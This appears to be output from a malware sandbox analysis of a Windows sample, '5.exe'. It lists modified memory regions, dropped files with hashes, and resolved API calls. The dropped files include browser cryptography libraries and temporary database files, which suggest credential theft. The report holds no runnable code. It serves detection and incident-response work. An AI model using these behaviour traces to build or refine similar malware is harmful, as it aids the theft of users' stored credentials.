5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00409000, 0x00408FEA, ... False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040D36D, 0x0040B64F False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00401A8A, 0x0040AF97, ... False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00422DC0, 0x00424B80 False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00423300 False
...
buffer 0x00549D18 0x00559C80 Marked Executable - 32-bit - False
...
buffer 0x00549D18 0x00559C80 Content Changed - 32-bit 0x0054A643, 0x00549D18 False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0041A684 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040C3C4 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00414020 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00412564 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004108F8 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00415290 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004176D0 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00418CEC True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00419108 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040F944 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004132E0 True
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll 18.30 KB MD5: 502263c56f931df8440d7fd2fa7b7c00
SHA1: 523a3d7c3f4491e67fc710575d8e23314db2c1a2
SHA256: 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
SSDeep: 192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll 17.80 KB MD5: 88ff191fd8648099592ed28ee6c442a5
SHA1: 6a4f818b53606a5602c609ec343974c2103bc9cc
SHA256: c310cc91464c9431ab0902a561af947fa5c973925ff70482d3de017ed3f73b7d
SSDeep: 384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll 17.80 KB MD5: e2f648ae40d234a3892e1455b4dbbe05
SHA1: d9d750e828b629cfb7b402a3442947545d8d781b
SHA256: c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
SSDeep: 192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll 17.80 KB MD5: e479444bdd4ae4577fd32314a68f5d28
SHA1: 77edf9509a252e886d4da388bf9c9294d95498eb
SHA256: c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
SSDeep: 192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll 18.30 KB MD5: d0873e21721d04e20b6ffb038accf2f1
SHA1: 9e39e505d80d67b347b19a349a1532746c1f7f88
SHA256: bb25ccf8694d1fcfce85a7159dcf6985fdb54728d29b021cb3d14242f65909ce
SSDeep: 384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll 20.30 KB MD5: eff11130bfe0d9c90c0026bf2fb219ae
SHA1: cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
SHA256: 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
SSDeep: 384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll 19.80 KB MD5: 71af7ed2a72267aaad8564524903cff6
SHA1: 8a8437123de5a22ab843adc24a01ac06f48db0d3
SHA256: 5dd4ccd63e6ed07ca3987ab5634ca4207d69c47c2544dfefc41935617652820f
SSDeep: 384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll 18.30 KB MD5: 0d1aa99ed8069ba73cfd74b0fddc7b3a
SHA1: ba1f5384072df8af5743f81fd02c98773b5ed147
SHA256: 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
SSDeep: 384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll 17.80 KB MD5: 0f079489abd2b16751ceb7447512a70d
SHA1: 679dd712ed1c46fbd9bc8615598da585d94d5d87
SHA256: f7d450a0f59151bcefb98d20fcae35f76029df57138002db5651d1b6a33adc86
SSDeep: 192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll 18.30 KB MD5: ac290dad7cb4ca2d93516580452eda1c
SHA1: fa949453557d0049d723f9615e4f390010520eda
SHA256: c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SSDeep: 192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll 19.80 KB MD5: aec2268601470050e62cb8066dd41a59
SHA1: 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256: 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SSDeep: 384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/ 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll 18.80 KB MD5: 93d3da06bf894f4fa21007bee06b5e7d
SHA1: 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256: f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SSDeep: 192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll 25.80 KB MD5: 35fc66bd813d0f126883e695664e7b83
SHA1: 2fd63c18cc5dc4defc7ea82f421050e668f68548
SHA256: 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
SSDeep: 384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll 429.80 KB MD5: 109f0f02fd37c84bfc7508d4227d7ed5
SHA1: ef7420141bb15ac334d3964082361a460bfdb975
SHA256: 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SSDeep: 12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll 21.30 KB MD5: 94ae25c7a5497ca0be6882a00644ca64
SHA1: f7ac28bbc47e46485025a51eeb6c304b70cee215
SHA256: 7ea06b7050f9ea2bcc12af34374bdf1173646d4e5ebf66ad690b37f4df5f3d4e
SSDeep: 384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll 324.95 KB MD5: 343aa83574577727aabe537dccfdeafc
SHA1: 9ce3b9a182429c0dba9821e2e72d3ab46f5d0a06
SHA256: 393ae7f06fe6cd19ea6d57a93dd0acd839ee39ba386cf1ca774c4c59a3bfebd8
SSDeep: 6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll 17.80 KB MD5: cb978304b79ef53962408c611dfb20f5
SHA1: eca42f7754fb0017e86d50d507674981f80bc0b9
SHA256: 90fae0e7c3644a6754833c42b0ac39b6f23859f9a7cf4b6c8624820f59b9dad3
SSDeep: 192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll 17.80 KB MD5: 6d778e83f74a4c7fe4c077dc279f6867
SHA1: f5d9cf848f79a57f690da9841c209b4837c2e6c3
SHA256: a97dcca76cdb12e985dff71040815f28508c655ab2b073512e386dd63f4da325
SSDeep: 192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll 17.80 KB MD5: 6db54065b33861967b491dd1c8fd8595
SHA1: ed0938bbc0e2a863859aad64606b8fc4c69b810a
SHA256: 945cc64ee04b1964c1f9fcdc3124dd83973d332f5cfb696cdf128ca5c4cbd0e5
SSDeep: 384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll 17.80 KB MD5: 2ea3901d7b50bf6071ec8732371b821c
SHA1: e7be926f0f7d842271f7edc7a4989544f4477da7
SHA256: 44f6df4280c8ecc9c6e609b1a4bfee041332d337d84679cfe0d6678ce8f2998a
SSDeep: 192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll 17.44 KB MD5: d97a1cb141c6806f0101a5ed2673a63d
SHA1: d31a84c1499a9128a8f0efea4230fcfa6c9579be
SHA256: deccd75fc3fc2bb31338b6fe26deffbd7914c6cd6a907e76fd4931b7d141718c
SSDeep: 192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll 18.30 KB MD5: d500d9e24f33933956df0e26f087fd91
SHA1: 6c537678ab6cfd6f3ea0dc0f5abefd1c4924f0c0
SHA256: bb33a9e906a5863043753c44f6f8165afe4d5edb7e55efa4c7e6e1ed90778eca
SSDeep: 384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll 17.80 KB MD5: 6f6796d1278670cce6e2d85199623e27
SHA1: 8aa2155c3d3d5aa23f56cd0bc507255fc953ccc3
SHA256: c4f60f911068ab6d7f578d449ba7b5b9969f08fc683fd0ce8e2705bbf061f507
SSDeep: 192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll 18.80 KB MD5: 5f73a814936c8e7e4a2dfd68876143c8
SHA1: d960016c4f553e461afb5b06b039a15d2e76135e
SHA256: 96898930ffb338da45497be019ae1adcd63c5851141169d3023e53ce4c7a483e
SSDeep: 192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll 18.94 KB MD5: a2d7d7711f9c0e3e065b2929ff342666
SHA1: a17b1f36e73b82ef9bfb831058f187535a550eb8
SHA256: 9dab884071b1f7d7a167f9bec94ba2bee875e3365603fa29b31de286c6a97a1d
SSDeep: 384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll 18.30 KB MD5: d0289835d97d103bad0dd7b9637538a1
SHA1: 8ceebe1e9abb0044808122557de8aab28ad14575
SHA256: 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
SSDeep: 384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll 17.30 KB MD5: fee0926aa1bf00f2bec9da5db7b2de56
SHA1: f5a4eb3d8ac8fb68af716857629a43cd6be63473
SHA256: 8eb5270fa99069709c846db38be743a1a80a42aa1a88776131f79e1d07cc411c
SSDeep: 192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll 17.30 KB MD5: fdba0db0a1652d86cd471eaa509e56ea
SHA1: 3197cb45787d47bac80223e3e98851e48a122efa
SHA256: 2257fea1e71f7058439b3727ed68ef048bd91dcacd64762eb5c64a9d49df0b57
SSDeep: 384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll 17.80 KB MD5: 12cc7d8017023ef04ebdd28ef9558305
SHA1: f859a66009d1caae88bf36b569b63e1fbdae9493
SHA256: 7670fdede524a485c13b11a7c878015e9b0d441b7d8eb15ca675ad6b9c9a7311
SSDeep: 384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll 18.80 KB MD5: 19a40af040bd7add901aa967600259d9
SHA1: 05b6322979b0b67526ae5cd6e820596cbe7393e4
SHA256: 4b704b36e1672ae02e697efd1bf46f11b42d776550ba34a90cd189f6c5c61f92
SSDeep: 384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll 17.80 KB MD5: babf80608fd68a09656871ec8597296c
SHA1: 33952578924b0376ca4ae6a10b8d4ed749d10688
SHA256: 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
SSDeep: 384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll 18.80 KB MD5: 6ea692f862bdeb446e649e4b2893e36f
SHA1: 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256: 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SSDeep: 384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll 21.80 KB MD5: 72e28c902cd947f9a3425b19ac5a64bd
SHA1: 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256: 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SSDeep: 384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll 18.30 KB MD5: a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1: 116846ca871114b7c54148ab2d968f364da6142f
SHA256: 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SSDeep: 192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll 22.30 KB MD5: 41a348f9bedc8681fb30fa78e45edb24
SHA1: 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256: c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SSDeep: 384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll 22.94 KB MD5: 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1: 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256: 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SSDeep: 384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll 1.19 MB MD5: 556ea09421a0f74d31c4c0a89a70dc23
SHA1: f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256: f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SSDeep: 24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll 135.95 KB MD5: 9e682f1eb98a9d41468fc3e50f907635
SHA1: 85e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256: 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SSDeep: 3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll 81.82 KB MD5: 7587bf9cb4147022cd5681b015183046
SHA1: f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256: c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SSDeep: 1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll 23.80 KB MD5: fefb98394cb9ef4368da798deab00e21
SHA1: 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256: b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SSDeep: 384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll 28.30 KB MD5: 8b0ba750e7b15300482ce6c961a932f0
SHA1: 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256: bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SSDeep: 384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll 20.30 KB MD5: 849f2c3ebf1fcba33d16153692d5810f
SHA1: 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256: 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SSDeep: 384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll 18.30 KB MD5: b52a0ca52c9c207874639b62b6082242
SHA1: 6fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256: a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SSDeep: 192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp 18.00 KB MD5: 29844404ae855e9df054833f71888eb1
SHA1: 3e86f08def08fc14ddec0227d0643319562666db
SHA256: c381401ea96dfe9b926126dcbbc0dd6ab541dbf549732cc6c66f20096b1f663e
SSDeep: 24:LLijhJ0KL7G0TMJHUyyJtmCm0u6lOKQAE9V8FsffDVOzeCmly6UwcTa/HMQW:wz+JH3yJUhJCVE9V8FsXhFlNU1Ts3W 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp 7.00 KB MD5: 0111897c22e2ab86bfd65ccf91adc717
SHA1: c499d8febec0f0cb771a654fc65699c22226fe37
SHA256: cff896f26e26cdf1a63e312f89795366ee2bc902323cabe44a86aa4ad0977228
SSDeep: 48:tNecVTgPOpEveoJZFrU10WB58PdJAKr1EcO:tVSNDX25E 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp 512.00 KB MD5: ca84b062330bf89c92f6da9fbd818b9e
SHA1: f52fd559629cecf4a02037663c6d9bf171ac7235
SHA256: 3ce8414a491044fca9d5c4de1af15fc54c06ba021a7ba2199e092f35c42fbdf4
SSDeep: 48:DML4nwTqMXQ98wM6ckr3ekPokj+rU+D0KHhS0wy:Dbn39e8DdPHaB33 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm 32.00 KB MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA1: 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SSDeep: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp 68.00 KB MD5: 3067eb8025ae0262c7a5c681d7982d67
SHA1: 534976f915f2dd49adcf09677f9d38a0d0cfee63
SHA256: 9260dd9c2b2253e0a886f4d66e22c561d23604fe0010bbac8240f8fdc3aaf945
SSDeep: 96:byNQIoYnMvqyWx7pnqH+w/fVIrECuKdPraBdUDBBVWqwmKT/WTPepeWbtxYB+tCX:blkMvuzzTP6btWutle 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp 100.00 KB MD5: 3c72a569901a8a45018d9d7c542a1857
SHA1: 9bb7a9a87b5a8b7c4c556b8271d4af0373911389
SHA256: 06bb2bfe3a0612482499e0b0f175b85b66c9f4d32e6b700d740ea801ea9c764e
SSDeep: 96:rZLJLdogEU+08l50etKCpjjJwCJA+ETzgcc+8EyZ/cCzwwC+AbIN0NAm:tJdogD+0O5rKC5ti5yDe 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll 71.30 KB MD5: 9910a1bfdc41c5b39f6af37f0a22aacd
SHA1: 47fa76778556f34a5e7910c816c78835109e4050
SHA256: 65ded8d2ce159b2f5569f55b2caf0e2c90f3694bd88c89de790a15a49d8386b9
SSDeep: 1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll 18.80 KB MD5: 8d02dd4c29bd490e672d271700511371
SHA1: f3035a756e2e963764912c6b432e74615ae07011
SHA256: c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SSDeep: 192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll 90.45 KB MD5: 569a7a65658a46f9412bdfa04f86e2b2
SHA1: 44cc0038e891ae73c43b61a71a46c97f98b1030d
SHA256: 541a293c450e609810279f121a5e9dfa4e924d52e8b0c6c543512b5026efe7ec
SSDeep: 1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll 140.95 KB MD5: 67827db2380b5848166a411bae9f0632
SHA1: f68f1096c5a3f7b90824aa0f7b9da372228363ff
SHA256: 9a7f11c212d61856dfc494de111911b7a6d9d5e9795b0b70bbbc998896f068ae
SSDeep: 3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll 1.09 MB MD5: d6326267ae77655f312d2287903db4d3
SHA1: 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256: 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SSDeep: 24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb 		False
...
Threads
Thread 0xa3c
1021 96
»
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.DLL, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessId, address_out = 0x76c5cf04 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessWorkingSetSize, address_out = 0x76cbe359 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UpdateResourceW, address_out = 0x76cc3475 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalExit, address_out = 0x76cb2d37 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x76c31886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
